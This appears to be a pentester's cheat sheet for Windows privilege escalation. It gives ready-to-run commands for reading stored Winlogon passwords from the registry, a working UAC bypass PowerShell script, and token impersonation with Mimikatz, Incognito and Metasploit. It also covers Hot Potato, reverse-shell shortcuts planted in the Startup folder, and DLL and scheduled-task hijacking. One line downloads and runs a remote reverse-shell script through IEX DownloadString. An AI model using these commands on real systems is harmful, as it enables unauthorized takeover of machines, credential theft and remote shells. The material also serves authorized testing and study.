To read the registry values without PowerShell, specify the architecture:
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword /reg:64
#Scenario: Priv esc using stolen creds through port forwarding.
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
Physical Access
#Create live bootable OS & login. Download chntpw.
chntpw -l SAM
Remove the password for existing user A/c. Login with <blank> password.
Open CMD, add new user to LA group.
#Look for group Mandatory Label\Medium Mandatory Level + Local Admin Privileges
whoami /groups
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Now notice the three highlighted keys above and their values.
EnableLUA tells us whether UAC is enabled. If 0 we don’t need to bypass it at all can just PsExec to SYSTEM. If it’s 1 however, then check the other 2 keys
ConsentPromptBehaviorAdmin can theoretically take on 6 possible values (readable explanation here), but from configuring the UAC slider in Windows settings it takes on either 0, 2 or 5.
#Save as uac.ps1
if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
#Payload goes here net user hacker Password123! /add
#It'll run as Administrator
} else {
$registryPath = "HKCU:\Environment"
$Name = "windir"
$Value = "powershell -ep bypass -w h $PSCommandPath;#"
Set-ItemProperty -Path $registryPath -Name $name -Value $Value
#Depending on the performance of the machine, some sleep time may be required before or after schtasks
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
Remove-ItemProperty -Path $registryPath -Name $name
}
If we have "FullControl" over a registry key, we can make changes to the vulnerable service. Maliciously replace the executable of the service. The service would perform elevated commands.
Token impersonation is a technique you can use as local admin to impersonate another user logged on to a system. This is very useful in scenarios where you are local admin on a machine and want to impersonate another logged on user, e.g a domain administrator.
SeAssignPrimaryToken and SeImpersonateprivileges allow you to run code or even create a new process in the context of another user.
What are Tokens?
Think cookies for computers
Temporary keys that allow access to a system/network without having to provide credentials each time you access a file.
Types of Tokens
Delegate: Created for logging into a machine or using RDP.
Impersonate: "Non-interactive" such as attaching a network drive or a domain logon script.
#Invoke-TokenManipulation [Looks for interactive logon tokens]
Invoke-TokenManipulation -ImpersonateUser -Username "<Domain\User>"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowershell\v1.0\Powershell.exe" -ProcessId 500
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');\"};"
#Mimikatz [Requires LA]
token::list
token::elevate
#Incognito.exe
# Show tokens on the machine
.\incognito.exe list_tokens -u
# Start new process with token of a specific user
.\incognito.exe execute -c "domain\user" C:\Windows\system32\calc.exe
#Metasploit
load incognito
list_tokens -u
impersonate_token <domain>\\Administrator
shell
HotPotato
Hot Potato is the name of an attack that uses a spoofing attack along with an NTLM relay attack to gain SYSTEM privileges. The attack tricks Windows into authenticating as the SYSTEM user to a fake HTTP server using NTLM. The NTLM credentials then get relayed to SMB in order to gain command execution.
.\potato.exe -ip <Local host's IP:192.168.1.33> -cmd "C:\Temp\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
#Wait for a Windows Defender update, or trigger one manually.
Step 2: Generate payload[msfvenom] and replace with program.exe. Start handler.
Step 3: Wait for Administrator to login. Program gets executed. Viola! You have a shell.
AutoRuns
Windows can be configured to run commands at startup, with elevated privileges. These “AutoRuns” are configured in the Registry. If you are able to write to an AutoRun executable, and are able to restart the system (or wait for it to be restarted) you may be able to escalate privileges
#Check for Write-Access:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
#Save as CreateShortcut.vbs
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\Path_to\reverseshell.exe"
oLink.Save
#Create the reverse.lnk file on the StartUp directory & wait for login.
cscript CreateShortcut.vbs
AlwaysInstallElevated Escalation
Admins may deploy installer packages [.msi] which execute with always elevated privileges.
“AlwaysInstallElevated” value must be set to 1 for both the local machine and current user in the registries. If either of these are missing or disabled, the exploit will not work.
Tricking a legitimate application into loading an arbitrary DLL
Programs usually can't function by themselves, they have a lot of resources they need to hook into (mostly DLL's but also proprietary files). If a program or service loads a file from a directory we have write access to we can abuse that to pop a shell with the privileges the program runs as.
Manual Analysis:
Tool : Procmon.exe
Add a new filter on the Process Name matching <Service.exe>
On the main screen, deselect registry activity and network activity.
Folders that are created at the root of a partition allow any “Authenticated User” to create files and folders in them if the program installer/administrator doesn’t take care of that.
With this in mind, here are the two most common scenarios you’ll face:
The program installer created a service which runs as NT AUTHORITY\SYSTEM and executes a program from this directory. In this example, we consider that the permissions of the executable itself are properly configured though. In this case, there is a high chance that it is vulnerable to DLL Sideloading. A local attacker could plant a Windows DLL that is used by this service in the application’s folder.
The program installer added the application’s directory to the system’s %PATH%. This case is a bit different. You could still use DLL Sideloading in order to execute code in the context of any other user who would run this application but you could also achieve privilege escalation to SYSTEM. What you need in this case is Ghost DLL Hijacking because, a nonexistent DLL lookup will ultimately end up in the %PATH% directories.
Ideal Candidate for Ghost DLL Hijacking
It tries to load a nonexistent DLL without specifying its full path.
Unfortunately, there is no easy method for enumerating custom tasks that belong to other users as a low privileged user account. Often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run.
#List all scheduled tasks your user can see
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
#Check for write privileges:
accesschk.exe /accepteula -quvw userx C:\DevTools\vulnscript.ps1
Named Pipes
You may be already familiar with the concept of a “pipe” in Windows & Linux:
systeminfo | findstr Windows
Designed to escalate from Local Admin to SYSTEM privileges.
A named pipe is an extension of this concept. A process can create a named pipe, and other processes can open the named pipe to read or write data from/to it. The process which created the named pipe can impersonate the security context of a process which connects to the named pipe.
Metasploit: Getsystem
InMemory: Creates a named pipe controlled by Meterpreter. Creates a service (running as SYSTEM) which runs a command that interacts directly with the named pipe. Meterpreter then impersonates the connected process to get an impersonation access token (with the SYSTEM security context). The access token is then assigned to all subsequent Meterpreter threads, meaning they run with SYSTEM privileges.
Dropper: Only difference is a DLL is written to disk, and a service created which runs the DLL as SYSTEM. The DLL connects to the named pipe.
Token Duplication:
Requires the “SeDebugPrivilege”.
Only works on x86 architectures.
It finds a service running as SYSTEM which it injects a DLL into. The DLL duplicates the access token of the service and assigns it to Meterpreter. This is the only technique that does not have to create a service, and operates entirely in memory.